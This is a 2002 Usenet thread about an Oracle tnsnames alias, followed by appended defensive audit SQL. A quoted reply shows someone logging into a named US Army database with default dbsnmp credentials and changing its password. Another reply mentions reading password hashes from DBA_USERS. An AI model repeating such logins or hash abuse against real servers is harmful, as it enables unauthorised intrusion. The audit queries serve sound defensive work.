
Re: putting an alias in my tnsnames for a change to report server

From: Howard J. Rogers <dba_at_hjrdba.com>
Date: Fri, 12 Jul 2002 06:53:49 +1000
Message-ID: <agkr7i$hsh$1@lust.ihug.co.nz>


It is indeed astonishing.

The user dbsnmp appears to have rights to the dba_users view. That exposes everyone's hashed passwords. I didn't go any further with the usual 'alter user...values', but the implications are horrifying.

Thank God this was only 8.1.7.2.1... had it been 9i, I would have been tempted to try a spurious left outer join....

It needs fixing as a matter of some urgency, that's for sure.

Regards
HJR

"Daniel Morgan" <dmorgan_at_exesolutions.com> wrote in message news:3D2DAD51.D866DD54_at_exesolutions.com...
> Martin Haltmayer wrote:
>
> > Oh boy, don't be too sure!
> >
> > The tnsnames.ora used for this has the following entry, all deducted from your post:
> >
> > mil.world =
> > (description =
> > (address = (protocol = tcp) (host = 144.101.14.115 ) (port = 1521))
> > (connect_data = ( SERVICE_NAME = apandev.mtmc.army.mil ))
> > )
> >
> > G:\Daten\Martin\tests>sqlplus dbsnmp/dbsnmp_at_mil.world
> >
> > SQL*Plus: Release 8.1.7.0.0 - Production on Thu Jul 11 16:03:14 2002
> >
> > (c) Copyright 2000 Oracle Corporation. All rights reserved.
> >
> > Connected to:
> > Oracle8i Enterprise Edition Release 8.1.7.2.1 - Production
> > JServer Release 8.1.7.2.1 - Production
> >
> > SQL> set feedback on
> > SQL> set linesize 110
> > SQL> set pagesize 60
> > SQL> set timing on
> > SQL> set trimspool on
> > SQL> define _editor = lemmy.exe
> > SQL> set echo on
> > SQL> set feedback on
> > SQL> set linesize 1000
> > SQL> set pagesize 0
> > SQL> set timing on
> > SQL> set verify on
> > SQL> -- whenever sqlerror exit failure rollback
> > SQL> whenever sqlerror continue
> > SQL> select * from v$session;
> >
> > 8 rows selected.
> >
> > Elapsed: 00:00:04.86
> > SQL>
> > SQL> alter user dbsnmp identified by blafasel;
> >
> > User altered.
> >
> > Elapsed: 00:00:01.92
> >
> > Just try the new password!
> >
> > Regards,
> >
> > Martin
> >
> > Ryan Gaffuri wrote:
> > >
> > > spamdump_at_nospam.noway.nohow (Ed Stevens) wrote in message news:<3d22f243.176415341_at_ausnews.austin.ibm.com>...
> > > > On 2 Jul 2002 10:49:30 -0700, rgaffuri_at_cox.net (Ryan Gaffuri) wrote:
> > > >
> > > > > >I tried to add an alias to my tnsnames on both my oracle server and my
> > > > > >developer server. This is what I added. It's not working.....
> > > > > >
> > > > > >Per note: 139546.1 at the end under known issues. It says to add an
> > > > > >alias to my tnsnames to get around the issue with reports servers have
> > > > > >numbers, etc... in its name.
> > > > > >
> > > > > >Here is the part of the tnsnames.ora file that has the instance that
> > > > > >I'm interested and what I added:
> > > > >
> > > > >APANDEV.MTMC.ARMY.MIL =
> > > > > (DESCRIPTION =
> > > > > (ADDRESS_LIST =
> > > > > > (ADDRESS = (PROTOCOL = TCP)(HOST = 144.101.14.115)(PORT = 1521))
> > > > > )
> > > > > (CONNECT_DATA =
> > > > > (SERVICE_NAME = apandev.mtmc.army.mil)
> > > > > )
> > > > > )
> > > > >
> > > > > >myserver Rep60_HQ73-dev6i=(ADDRESS=(PROTOCOL=tcp)(HOST=HQ73-dev6i)(PORT
> > > > > >1521)
> > > > >
> > > > >
> > > > >There are 4-5 others instances listed in this tnsnames.. the
> > > > >
> > > > >Rep60_HQ73-dev6i comes directly out of my registry. What did I do
> > > > >wrong? It does not recognize this when I try to run the report with
> > > > >run_report_object?
> > > >
> > > > > The technical answer to your question has been answered. However, I would like
> > > > > to express some concern that you have exposed the IP address and other connect
> > > > > information of a military database. A good hacker (which I'm not) now knows the
> > > > > IP address, server DNS name, and listening port of a database server owned by
> > > > > the U.S. Army. Makes the hair stand up on the back of my neck.
> > >
> > > > try the IP address it won't work. Thanks for your concern.
>
> I sincerely hope I am wrong. But is the above posting as flagrant a violation of security as it appears to be?
>
> If so please be responsible, report this immediately, and have the server secured.
>
> Daniel Morgan
>
Received on Thu Jul 11 2002 - 15:53:49 CDT
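
The finding discussed in this thread (an agent account left on its shipped password and able to read DBA_USERS) can be checked from the DBA side. The queries below are an added example, not part of the original posts; they assume a DBA session, and query 2 assumes Oracle 11g or later, where the DBA_USERS_WITH_DEFPWD view exists.

```sql
-- Added audit example. 'DBSNMP' is the account named in the thread.

-- 1. Is the account open? An agent account that is not in use should be locked.
SELECT username, account_status, profile
FROM   dba_users
WHERE  username = 'DBSNMP';

-- 2. Is it still on its shipped password? (11g and later only)
SELECT username
FROM   dba_users_with_defpwd
WHERE  username = 'DBSNMP';

-- 3. Roles the account holds, directly or through other roles.
SELECT DISTINCT granted_role
FROM   dba_role_privs
START  WITH grantee = 'DBSNMP'
CONNECT BY PRIOR granted_role = grantee;

-- 4. Object grants on SYS.DBA_USERS that reach the account:
--    granted to it directly, to PUBLIC, or to one of its roles.
SELECT grantee, privilege
FROM   dba_tab_privs
WHERE  owner = 'SYS'
AND    table_name = 'DBA_USERS'
AND    grantee IN (SELECT 'DBSNMP' FROM dual
                   UNION ALL
                   SELECT 'PUBLIC' FROM dual
                   UNION ALL
                   SELECT granted_role
                   FROM   dba_role_privs
                   START  WITH grantee = 'DBSNMP'
                   CONNECT BY PRIOR granted_role = grantee);

-- 5. System privileges that expose the dictionary or allow
--    ALTER USER ... IDENTIFIED BY VALUES, by the same three routes.
SELECT grantee, privilege
FROM   dba_sys_privs
WHERE  privilege IN ('SELECT ANY TABLE', 'SELECT ANY DICTIONARY', 'ALTER USER')
AND    grantee IN (SELECT 'DBSNMP' FROM dual
                   UNION ALL
                   SELECT 'PUBLIC' FROM dual
                   UNION ALL
                   SELECT granted_role
                   FROM   dba_role_privs
                   START  WITH grantee = 'DBSNMP'
                   CONNECT BY PRIOR granted_role = grantee);
```

Any row from query 2, 4 or 5 is a finding to fix: change or lock the password, and revoke the grant from whichever grantee the row names.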
